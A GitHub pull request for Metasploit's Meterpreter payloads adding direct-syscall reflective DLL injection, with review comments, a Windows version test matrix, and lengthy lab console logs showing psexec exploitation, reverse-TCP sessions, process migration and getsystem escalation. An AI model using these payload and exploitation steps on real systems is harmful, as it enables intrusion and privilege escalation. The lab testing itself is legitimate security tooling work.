-
Notifications
You must be signed in to change notification settings - Fork 676
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Pull in changes from ReflectiveDLLInjection to support direct syscalls (2) #694
Pull in changes from ReflectiveDLLInjection to support direct syscalls (2) #694
Conversation
- Includes ColdGate.c in each project - Change railgun macro name to stdcall_func - Update VS configs - Update cmake files for mingw - Fix cmake files for kiwi builds - Update ReflectiveDLLInjection module to verify if CI passes - Update include file names & ReflectiveDLLInjection submodule
.gitmodules
Outdated
url = https://github.com/rapid7/ReflectiveDLLInjection.git | ||
url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git | ||
branch = direct_syscalls2 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'm pretty sure that because you've made a pull request to rapid7/ReflectiveDLLInjection from your own branch you actually don't need these change in this file. The reference will be resolved and the changes in your PR will be pulled in. That would actually be the ideal way to have this configured because then this PR could be landed without needing to revert these changes here.
If and when you make changes to the ReflectiveDLLInjection repo, you'd just git pull
your changes however you need to so the commit hash is correct.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, I agree, this was the original implementation, but we wanted to check if CI was passing with all these changes (see this comment). I'll roll back to the original once the ReflectiveDLLInjection
PR is landed.
Also, I'm fine to revert it now if you think it was not a good idea.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've tested the 32-bit and 64-bit payloads with the MSVC and MinGW builds. Everything I've tested appears to be working as intended.
- 🟢 MinGW builds from docker work for x86 and x64
- 🟢 MSVC builds all compile without any issues
- 🟢 x86 payloads work on 64-bit hosts by running in Wow64 as tested on Windows 11
- 🟢 Migrate works for x86 and x64 payloads
- 🟢
getsystem
works as intended - 🟢
hashdump
works as intended
Testing Output
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|MSFLAB as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (554937 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49701) at 2024-01-11 14:36:36 -0500
meterpreter > sysinfo
Computer : DC
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 7
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
smsf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain MSFLAB no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser smcintyre no The username to authenticate as
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain MSFLAB no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser smcintyre no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|MSFLAB as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (488696 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:49705) at 2024-01-11 14:39:47 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DC
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 7
Meterpreter : x86/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
116 652 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
136 4 Registry x64 0
344 4 smss.exe x64 0
396 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
448 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
464 448 csrss.exe x64 0
572 448 wininit.exe x64 0
580 564 csrss.exe x64 1
652 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
728 572 services.exe x64 0
748 572 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
804 652 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
972 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
992 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1048 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1056 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1120 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1128 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1136 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1248 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1256 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1272 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1300 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1368 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1488 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1576 572 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe
1580 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1624 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1676 652 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
1716 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1768 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1776 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1784 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1812 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1832 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1856 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1900 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2004 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2096 1508 SIHClient.exe x64 0
2120 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2148 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2160 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2224 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2276 2812 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2312 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2336 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2444 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2500 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2536 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2556 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2808 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3320 728 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
3424 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3432 728 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
3440 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3448 728 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
3456 728 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
3464 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3472 728 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3480 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3488 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3500 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3512 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3524 728 MsMpEng.exe x64 0
3536 728 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
3544 728 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
3560 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3660 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3808 728 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
3996 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4448 992 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
4592 728 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4732 2276 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
4740 728 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
5364 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5528 728 svchost.exe x64 0
5596 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5636 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5652 3400 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5676 728 svchost.exe x64 0
5684 5652 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
5708 728 svchost.exe x64 0
5816 992 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
meterpreter > migrate 1368
[*] Migrating from 2276 to 1368...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 1346
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter > exit
[*] Shutting down session: 2
[*] 192.168.159.10 - Meterpreter session 2 closed. Reason: User exit
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|MSFLAB as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (488696 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.10:49726) at 2024-01-11 14:42:44 -0500
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
116 652 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
136 4 Registry x64 0
344 4 smss.exe x64 0
396 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
448 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
464 448 csrss.exe x64 0
572 448 wininit.exe x64 0
580 564 csrss.exe x64 1
652 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
728 572 services.exe x64 0
748 572 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
804 652 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
972 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
992 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1048 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1056 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1120 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1128 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1136 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1248 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1256 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1272 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1300 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1368 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1488 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1576 572 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe
1580 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1624 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1676 652 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
1716 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1768 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1776 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1784 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1812 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1832 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1856 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1900 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2004 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2120 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2148 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2160 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2224 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2248 4384 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2312 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2336 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2444 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2500 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2536 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2556 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2808 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3320 728 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
3424 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3432 728 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
3440 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3448 728 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
3456 728 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
3464 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3472 728 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3480 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3488 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3500 728 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3512 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3524 728 MsMpEng.exe x64 0
3536 728 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
3544 728 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
3560 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3660 728 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3808 728 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
3996 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4384 5704 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
4448 992 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
4592 728 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4620 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4740 728 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
5264 5344 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
5344 1856 CompatTelRunner.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\CompatTelRunner.exe
5364 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5528 728 svchost.exe x64 0
5596 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5636 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5652 3400 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5684 5652 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
5816 992 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
6020 728 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
meterpreter > migrate 396
[*] Migrating from 4384 to 396...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer : DC
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 7
Meterpreter : x64/windows
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows 10x64
For what it is worth, while Win 10x64 appears to work, I'm having trouble with Win10x86. I'll dig a bit deeper tomorrow:
|
Windows 2003x86🟢 Win2003x86 SP0
🟢 Win2003x86 SP1
🟢 Win2003x86R2 SP1
🟢 Win2003x86R2 SP2
|
Windows 8x86🟢 Windows 8x86
🟢 Windows 8.1x86
🟢 Windows 8.1 x86 SP1
|
🟢 Windows 10x86
|
🟢 Windows 10x64 WOW64
|
Not sure why, but it looks like x86 payloads are failing on Windows 2008x64. The x64 payloads work, and both work on 2008x64 R2. 🔴 Windows 2008x64 R1 WOW64Windows 2008 x64 R1
Windows 2008 x64 R2
|
Thank you @bwatters-r7 for testing. I've updated the |
🟢 Windows 10x64 x64/WOW64
|
x86 Payloads on native x86 VMs🔴 Windows 10x86
🔴 Windows 8x86
🟢 Windows 7x86
🟢 Windows XP_SP3
|
🟢 Windows 10x64
|
🟢 Windows 10x64 WOW64
|
🟢 Windows 10x86
|
🟢 Windows 7-8 x86
|
🟢 Windows 7-8 x64
msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C sysinfo
|
🟢 Windows 11
|
🟢 Windows Kernel 10 Servers
|
🟢 Windows 2003/2008 Server
|
🟢 Windows XP SP3 x86
|
Includes changes from: * rapid7/metasploit-payloads#694
Includes changes from: * rapid7/metasploit-payloads#694
Includes changes from: * rapid7/metasploit-payloads#694
This PR adds the necessary changes to support the direct syscalls version of
ReflectiveDLLInjection
. This is a new implementation based on this first PR. At this time, the related PR inReflectiveDLLInjection
repository is still under review but it is possible to test by updating theReflectiveDLLInjection
submodule reference:Don't forget to
git fetch
/git checkout
again if theReflectiveDLLInjection
branch is updated.Follow the standard documentation to build Meterpreter on Windows and with MinGW.
Testing with MSF
Once the DLL's are built, you need to copy
output/
directory content into the Metasploit Framework'sdata/meterpreter/
directory.Then in MSF console, test Meterpreter payloads (staged and single).
For example:
use windows/x64/meterpreter_reverse_tcp
set LHOST <your host IP>
generate -f exe -o direct_syscalls_payload.exe
to_handler
direct_syscalls_payload.exe
to the target and execute it, you should get a session.WARNING: Local file .../data/meterpreter/ext_server_stdapi.x64.dll is being used
getsystem
, etc. without issues.